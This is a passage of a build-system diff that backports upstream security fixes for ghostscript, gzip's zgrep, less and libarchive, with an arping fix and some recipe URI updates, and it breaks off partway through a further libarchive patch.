b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch @@ -0,0 +1,51 @@ +From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Fri, 12 Feb 2021 10:34:23 +0000 +Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation. + +During function result sampling, after the callout to the Postscript +interpreter, make sure there is enough stack space available before pushing +or popping entries. + +In thise case, the Postscript procedure for the "function" is totally invalid +(as a function), and leaves the op stack in an unrecoverable state (as far as +function evaluation is concerned). We end up popping more entries off the +stack than are available. + +To cope, add in stack limit checking to throw an appropriate error when this +happens. +CVE: CVE-2021-45944 +Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25] +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + psi/zfsample.c | 14 +++++++++++--- + 1 file changed, 11 insertions(+), 3 deletions(-) + +diff --git a/psi/zfsample.c b/psi/zfsample.c +index 290809405..652ae02c6 100644 +--- a/psi/zfsample.c ++++ b/psi/zfsample.c +@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + } else { + if (stack_depth_adjust) { + stack_depth_adjust -= num_out; +- push(O_STACK_PAD - stack_depth_adjust); +- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) +- make_null(op - i); ++ if ((O_STACK_PAD - stack_depth_adjust) < 0) { ++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); ++ check_op(stack_depth_adjust); ++ pop(stack_depth_adjust); ++ } ++ else { ++ check_ostack(O_STACK_PAD - stack_depth_adjust); ++ push(O_STACK_PAD - stack_depth_adjust); ++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) ++ make_null(op - i); ++ } + } + } + +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb index 32346e6811..e57f592892 100644 --- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb +++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb @@ -33,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d file://do-not-check-local-libpng-source.patch \ file://avoid-host-contamination.patch \ file://mkdir-p.patch \ + file://CVE-2020-15900.patch \ + file://check-stack-limits-after-function-evalution.patch \ + file://CVE-2021-45949.patch \ + file://CVE-2021-3781_1.patch \ + file://CVE-2021-3781_2.patch \ + file://CVE-2021-3781_3.patch \ + file://CVE-2023-28879.patch \ + file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \ + file://CVE-2023-36664-pre1.patch \ + file://CVE-2023-36664-1.patch \ + file://CVE-2023-36664-2.patch \ + file://CVE-2023-43115.patch \ + file://CVE-2020-36773.patch \ " SRC_URI = "${SRC_URI_BASE} \ file://ghostscript-9.21-prevent_recompiling.patch \ file://cups-no-gcrypt.patch \ - file://CVE-2020-15900.patch \ " SRC_URI_class-native = "${SRC_URI_BASE} \ diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index ab70ea98a3..7d0f74186e 100644 --- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch new file mode 100644 index 0000000000..046c95df47 --- /dev/null +++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch @@ -0,0 +1,45 @@ +From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001 +From: Lasse Collin <lasse.collin@tukaani.org> +Date: Mon, 4 Apr 2022 23:52:49 -0700 +Subject: [PATCH] zgrep: avoid exploit via multi-newline file names + +* zgrep.in: The issue with the old code is that with multiple +newlines, the N-command will read the second line of input, +then the s-commands will be skipped because it's not the end +of the file yet, then a new sed cycle starts and the pattern +space is printed and emptied. So only the last line or two get +escaped. This patch makes sed read all lines into the pattern +space and then do the escaping. + +This vulnerability was discovered by: +cleemy desu wayo working with Trend Micro Zero Day Initiative + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c] +CVE: CVE-2022-1271 + +Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org> +--- + zgrep.in | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/zgrep.in b/zgrep.in +index 3efdb52..d391291 100644 +--- a/zgrep.in ++++ b/zgrep.in +@@ -222,9 +222,13 @@ do + '* | *'&'* | *'\'* | *'|'*) + i=$(printf '%s\n' "$i" | + sed ' +- $!N +- $s/[&\|]/\\&/g +- $s/\n/\\n/g ++ :start ++ $!{ ++ N ++ b start ++ } ++ s/[&\|]/\\&/g ++ s/\n/\\n/g + ');; + esac + sed_script="s|^|$i:|" diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb index 9778e687e1..c558c21f10 100644 --- a/meta/recipes-extended/gzip/gzip_1.10.bb +++ b/meta/recipes-extended/gzip/gzip_1.10.bb @@ -4,6 +4,7 @@ LICENSE = "GPLv3+" SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \ file://run-ptest \ + file://CVE-2022-1271.patch \ " SRC_URI_append_class-target = " file://wrong-path-fix.patch" diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch new file mode 100644 index 0000000000..bf86115843 --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch @@ -0,0 +1,79 @@ +From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001 +From: lac-0073 <61903197+lac-0073@users.noreply.github.com> +Date: Mon, 26 Oct 2020 09:45:42 +0800 +Subject: [PATCH] arpping: make update neighbours work again + +The arping is using inconsistent sender_ip_addr and target_ip_addr in +messages. This causes the client receiving the arp message not to update +the arp table entries. + +The specific performance is as follows: + +There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the +same IP subnet as eth0. This IP was originally used on another machine 1, +and th IP needs to be changed back to the machine 1. When using the arping +command to announce what ethernet address has IP 10.20.30.3, the arp table +on machine 3 is not updated. + +Machine 3 original arp table: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Create interface eth0:0 on machine 1, and use the arping command to send arp +packets. Expected outcome on machine 3: + + 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Actual results on machine 3: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Fixes: https://github.com/iputils/iputils/issues/298 +Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339 +Signed-off-by: Aichun Li <liaichun@huawei.com> +Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098] +Signed-off-by: Visa Hankala <visa@hankala.org> +--- + arping.c | 16 +++++++++------- + 1 file changed, 9 insertions(+), 7 deletions(-) + +diff --git a/arping.c b/arping.c +index a002786..53fdbb4 100644 +--- a/arping.c ++++ b/arping.c +@@ -968,7 +968,7 @@ int main(int argc, char **argv) + } + memset(&saddr, 0, sizeof(saddr)); + saddr.sin_family = AF_INET; +- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { ++ if (ctl.source || ctl.gsrc.s_addr) { + saddr.sin_addr = ctl.gsrc; + if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) + error(2, errno, "bind"); +@@ -979,12 +979,14 @@ int main(int argc, char **argv) + saddr.sin_port = htons(1025); + saddr.sin_addr = ctl.gdst; + +- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) +- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); +- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) +- error(2, errno, "connect"); +- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) +- error(2, errno, "getsockname"); ++ if (!ctl.unsolicited) { ++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) ++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); ++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) ++ error(2, errno, "connect"); ++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) ++ error(2, errno, "getsockname"); ++ } + ctl.gsrc = saddr.sin_addr; + } + close(probe_fd); diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb index d652bfcaad..a715d0a37b 100644 --- a/meta/recipes-extended/iputils/iputils_s20190709.bb +++ b/meta/recipes-extended/iputils/iputils_s20190709.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ @@ -20,6 +20,7 @@ SRC_URI = "git://github.com/iputils/iputils \ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \ + file://0001-arping-make-update-neighbours-work-again.patch \ " SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch new file mode 100644 index 0000000000..409730bd4f --- /dev/null +++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch @@ -0,0 +1,41 @@ +From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001 +From: Mark Nudelman <markn@greenwoodsoftware.com> +Date: Sat, 25 Jun 2022 11:54:43 -0700 +Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE. + +Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144] +CVE: CVE-2022-48624 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + filename.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/filename.c b/filename.c +index 5824e385..dff20c08 100644 +--- a/filename.c ++++ b/filename.c +@@ -972,6 +972,8 @@ close_altfile(altfilename, filename) + { + #if HAVE_POPEN + char *lessclose; ++ char *qfilename; ++ char *qaltfilename; + FILE *fd; + char *cmd; + int len; +@@ -986,9 +988,13 @@ close_altfile(altfilename, filename) + error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG); + return; + } +- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2); ++ qfilename = shell_quote(filename); ++ qaltfilename = shell_quote(altfilename); ++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2); + cmd = (char *) ecalloc(len, sizeof(char)); +- SNPRINTF2(cmd, len, lessclose, filename, altfilename); ++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename); ++ free(qaltfilename); ++ free(qfilename); + fd = shellcmd(cmd); + free(cmd); + if (fd != NULL) diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb index a818c68fc7..401f40bed5 100644 --- a/meta/recipes-extended/less/less_551.bb +++ b/meta/recipes-extended/less/less_551.bb @@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ DEPENDS = "ncurses" SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \ + file://CVE-2022-48624.patch \ " SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819" diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb index 8e1cd349a0..309ae53bfb 100644 --- a/meta/recipes-extended/libaio/libaio_0.3.111.bb +++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://destdir.patch \ file://libaio_fix_for_mips_syscalls.patch \ diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch new file mode 100644 index 0000000000..555c7a47f7 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch @@ -0,0 +1,183 @@ +Description: Fix handling of symbolic link ACLs + Published as CVE-2021-23177 +Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad +Bug-Debian: https://bugs.debian.org/1001986 +Author: Martin Matuska <martin@matuska.org> +Last-Updated: 2021-12-20 + +CVE: CVE-2021-23177 +Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- a/libarchive/archive_disk_acl_freebsd.c ++++ b/libarchive/archive_disk_acl_freebsd.c +@@ -319,7 +319,7 @@ + + static int + set_acl(struct archive *a, int fd, const char *name, +- struct archive_acl *abstract_acl, ++ struct archive_acl *abstract_acl, __LA_MODE_T mode, + int ae_requested_type, const char *tname) + { + int acl_type = 0; +@@ -364,6 +364,13 @@ + return (ARCHIVE_FAILED); + } + ++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) { ++ errno = EINVAL; ++ archive_set_error(a, errno, ++ "Cannot set default ACL on non-directory"); ++ return (ARCHIVE_WARN); ++ } ++ + acl = acl_init(entries); + if (acl == (acl_t)NULL) { + archive_set_error(a, errno, +@@ -542,7 +549,10 @@ + else if (acl_set_link_np(name, acl_type, acl) != 0) + #else + /* FreeBSD older than 8.0 */ +- else if (acl_set_file(name, acl_type, acl) != 0) ++ else if (S_ISLNK(mode)) { ++ /* acl_set_file() follows symbolic links, skip */ ++ ret = ARCHIVE_OK; ++ } else if (acl_set_file(name, acl_type, acl) != 0) + #endif + { + if (errno == EOPNOTSUPP) { +@@ -677,14 +687,14 @@ + & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { + if ((archive_acl_types(abstract_acl) + & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) { +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access"); + if (ret != ARCHIVE_OK) + return (ret); + } + if ((archive_acl_types(abstract_acl) + & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0) +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default"); + + /* Simultaneous POSIX.1e and NFSv4 is not supported */ +@@ -693,7 +703,7 @@ + #if ARCHIVE_ACL_FREEBSD_NFS4 + else if ((archive_acl_types(abstract_acl) & + ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) { +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4"); + } + #endif +--- a/libarchive/archive_disk_acl_linux.c ++++ b/libarchive/archive_disk_acl_linux.c +@@ -343,6 +343,11 @@ + return (ARCHIVE_FAILED); + } + ++ if (S_ISLNK(mode)) { ++ /* Linux does not support RichACLs on symbolic links */ ++ return (ARCHIVE_OK); ++ } ++ + richacl = richacl_alloc(entries); + if (richacl == NULL) { + archive_set_error(a, errno, +@@ -455,7 +460,7 @@ + #if ARCHIVE_ACL_LIBACL + static int + set_acl(struct archive *a, int fd, const char *name, +- struct archive_acl *abstract_acl, ++ struct archive_acl *abstract_acl, __LA_MODE_T mode, + int ae_requested_type, const char *tname) + { + int acl_type = 0; +@@ -488,6 +493,18 @@ + return (ARCHIVE_FAILED); + } + ++ if (S_ISLNK(mode)) { ++ /* Linux does not support ACLs on symbolic links */ ++ return (ARCHIVE_OK); ++ } ++ ++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) { ++ errno = EINVAL; ++ archive_set_error(a, errno, ++ "Cannot set default ACL on non-directory"); ++ return (ARCHIVE_WARN); ++ } ++ + acl = acl_init(entries); + if (acl == (acl_t)NULL) { + archive_set_error(a, errno, +@@ -727,14 +744,14 @@ + & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { + if ((archive_acl_types(abstract_acl) + & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) { +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access"); + if (ret != ARCHIVE_OK) + return (ret); + } + if ((archive_acl_types(abstract_acl) + & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0) +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default"); + } + #endif /* ARCHIVE_ACL_LIBACL */ +--- a/libarchive/archive_disk_acl_sunos.c ++++ b/libarchive/archive_disk_acl_sunos.c +@@ -443,7 +443,7 @@ + + static int + set_acl(struct archive *a, int fd, const char *name, +- struct archive_acl *abstract_acl, ++ struct archive_acl *abstract_acl, __LA_MODE_T mode, + int ae_requested_type, const char *tname) + { + aclent_t *aclent; +@@ -467,7 +467,6 @@ + if (entries == 0) + return (ARCHIVE_OK); + +- + switch (ae_requested_type) { + case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E: + cmd = SETACL; +@@ -492,6 +491,12 @@ + return (ARCHIVE_FAILED); + } + ++ if (S_ISLNK(mode)) { ++ /* Skip ACLs on symbolic links */ ++ ret = ARCHIVE_OK; ++ goto exit_free; ++ } ++ + e = 0; + + while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type, +@@ -801,7 +806,7 @@ + if ((archive_acl_types(abstract_acl) + & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { + /* Solaris writes POSIX.1e access and default ACLs together */ +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e"); + + /* Simultaneous POSIX.1e and NFSv4 is not supported */ +@@ -810,7 +815,7 @@ + #if ARCHIVE_ACL_SUNOS_NFS4 + else if ((archive_acl_types(abstract_acl) & + ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) { +- ret = set_acl(a, fd, name, abstract_acl, ++ ret = set_acl(a, fd, name, abstract_acl, mode, + ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4"); + } + #endif diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch new file mode 100644 index 0000000000..c4a2fb612c --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch @@ -0,0 +1,23 @@ +Description: Never follow symlinks when setting file flags on Linux + Published as CVE-2021-31566 +Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b +Bug-Debian: https://bugs.debian.org/1001990 +Author: Martin Matuska <martin@matuska.org> +Last-Update: 2021-12-20 + +CVE: CVE-2021-31566 +Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- a/libarchive/archive_write_disk_posix.c ++++ b/libarchive/archive_write_disk_posix.c +@@ -3927,7 +3927,8 @@ + + /* If we weren't given an fd, open it ourselves. */ + if (myfd < 0) { +- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC); ++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | ++ O_CLOEXEC | O_NOFOLLOW); + __archive_ensure_cloexec_flag(myfd); + } + if (myfd < 0) diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch new file mode 100644 index 0000000000..0dfcd1ac5c --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch @@ -0,0 +1,172 @@ +Description: Do not follow symlinks when processing the fixup list + Published as CVE-2021-31566 +Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043 +Bug-Debian: https://bugs.debian.org/1001990 +Author: Martin Matuska <martin@matuska.org> +Last-Update: 2021-12-20 + +CVE: CVE-2021-31566 +Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- a/Makefile.am ++++ b/Makefile.am +@@ -556,6 +556,7 @@ + libarchive/test/test_write_disk.c \ + libarchive/test/test_write_disk_appledouble.c \ + libarchive/test/test_write_disk_failures.c \ ++ libarchive/test/test_write_disk_fixup.c \ + libarchive/test/test_write_disk_hardlink.c \ + libarchive/test/test_write_disk_hfs_compression.c \ + libarchive/test/test_write_disk_lookup.c \ +--- a/libarchive/archive_write_disk_posix.c ++++ b/libarchive/archive_write_disk_posix.c +@@ -2461,6 +2461,7 @@ + { + struct archive_write_disk *a = (struct archive_write_disk *)_a; + struct fixup_entry *next, *p; ++ struct stat st; + int fd, ret; + + archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC, +@@ -2478,6 +2479,20 @@ + (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) { + fd = open(p->name, + O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC); ++ if (fd == -1) { ++ /* If we cannot lstat, skip entry */ ++ if (lstat(p->name, &st) != 0) ++ goto skip_fixup_entry; ++ /* ++ * If we deal with a symbolic link, mark ++ * it in the fixup mode to ensure no ++ * modifications are made to its target. ++ */ ++ if (S_ISLNK(st.st_mode)) { ++ p->mode &= ~S_IFMT; ++ p->mode |= S_IFLNK; ++ } ++ } + } + if (p->fixup & TODO_TIMES) { + set_times(a, fd, p->mode, p->name, +@@ -2492,7 +2507,12 @@ + fchmod(fd, p->mode); + else + #endif +- chmod(p->name, p->mode); ++#ifdef HAVE_LCHMOD ++ lchmod(p->name, p->mode); ++#else ++ if (!S_ISLNK(p->mode)) ++ chmod(p->name, p->mode); ++#endif + } + if (p->fixup & TODO_ACLS) + archive_write_disk_set_acls(&a->archive, fd, +@@ -2503,6 +2523,7 @@ + if (p->fixup & TODO_MAC_METADATA) + set_mac_metadata(a, p->name, p->mac_metadata, + p->mac_metadata_size); ++skip_fixup_entry: + next = p->next; + archive_acl_clear(&p->acl); + free(p->mac_metadata); +@@ -2643,6 +2664,7 @@ + fe->next = a->fixup_list; + a->fixup_list = fe; + fe->fixup = 0; ++ fe->mode = 0; + fe->name = strdup(pathname); + return (fe); + } +--- a/libarchive/test/CMakeLists.txt ++++ b/libarchive/test/CMakeLists.txt +@@ -208,6 +208,7 @@ + test_write_disk.c + test_write_disk_appledouble.c + test_write_disk_failures.c ++ test_write_disk_fixup.c + test_write_disk_hardlink.c + test_write_disk_hfs_compression.c + test_write_disk_lookup.c +--- /dev/null ++++ b/libarchive/test/test_write_disk_fixup.c +@@ -0,0 +1,77 @@ ++/*- ++ * Copyright (c) 2021 Martin Matuska ++ * All rights reserved. ++ * ++ * Redistribution and use in source and binary forms, with or without ++ * modification, are permitted provided that the following conditions ++ * are met: ++ * 1. Redistributions of source code must retain the above copyright ++ * notice, this list of conditions and the following disclaimer. ++ * 2. Redistributions in binary form must reproduce the above copyright ++ * notice, this list of conditions and the following disclaimer in the ++ * documentation and/or other materials provided with the distribution. ++ * ++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR ++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES ++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. ++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT, ++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT ++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, ++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY ++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT ++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF ++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ++ */ ++#include "test.h" ++ ++/* ++ * Test fixup entries don't follow symlinks ++ */ ++DEFINE_TEST(test_write_disk_fixup) ++{ ++ struct archive *ad; ++ struct archive_entry *ae; ++ int r; ++ ++ if (!canSymlink()) { ++ skipping("Symlinks not supported"); ++ return; ++ } ++ ++ /* Write entries to disk. */ ++ assert((ad = archive_write_disk_new()) != NULL); ++ ++ /* ++ * Create a file ++ */ ++ assertMakeFile("victim", 0600, "a"); ++ ++ /* ++ * Create a directory and a symlink with the same name ++ */ ++ ++ /* Directory: dir */ ++ assert((ae = archive_entry_new()) != NULL); ++ archive_entry_copy_pathname(ae, "dir"); ++ archive_entry_set_mode(ae, AE_IFDIR | 0606); ++ assertEqualIntA(ad, 0, archive_write_header(ad, ae)); ++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad)); ++ archive_entry_free(ae); ++ ++ /* Symbolic Link: dir -> foo */ ++ assert((ae = archive_entry_new()) != NULL); ++ archive_entry_copy_pathname(ae, "dir"); ++ archive_entry_set_mode(ae, AE_IFLNK | 0777); ++ archive_entry_set_size(ae, 0); ++ archive_entry_copy_symlink(ae, "victim"); ++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae)); ++ if (r >= ARCHIVE_WARN) ++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad)); ++ archive_entry_free(ae); ++ ++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad)); ++ ++ /* Test the entries on disk. */ ++ assertIsSymlink("dir", "victim", 0); ++ assertFileMode("victim", 0600); ++} diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch new file mode 100644 index 0000000000..fca53fc9b6 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch @@ -0,0 +1,321 @@ +From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001 +From: Grzegorz Antoniak <ga@anadoxin.org> +Date: Sat, 13 Feb 2021 09:08:13 +0100 +Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files + +Added more range checks in the bit stream reading functions +(read_bits_16 and read_bits_32) in order to better guard against out of +memory reads. + +This commit contains a test with OSSFuzz sample #30448. + +Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1] +CVE: CVE-2021-36976 +Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> +--- + Makefile.am | 1 + + libarchive/archive_read_support_format_rar5.c | 108 ++++++++++-------- + libarchive/test/test_read_format_rar5.c | 16 +++ + ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++ + 4 files changed, 89 insertions(+), 46 deletions(-) + create mode 100644 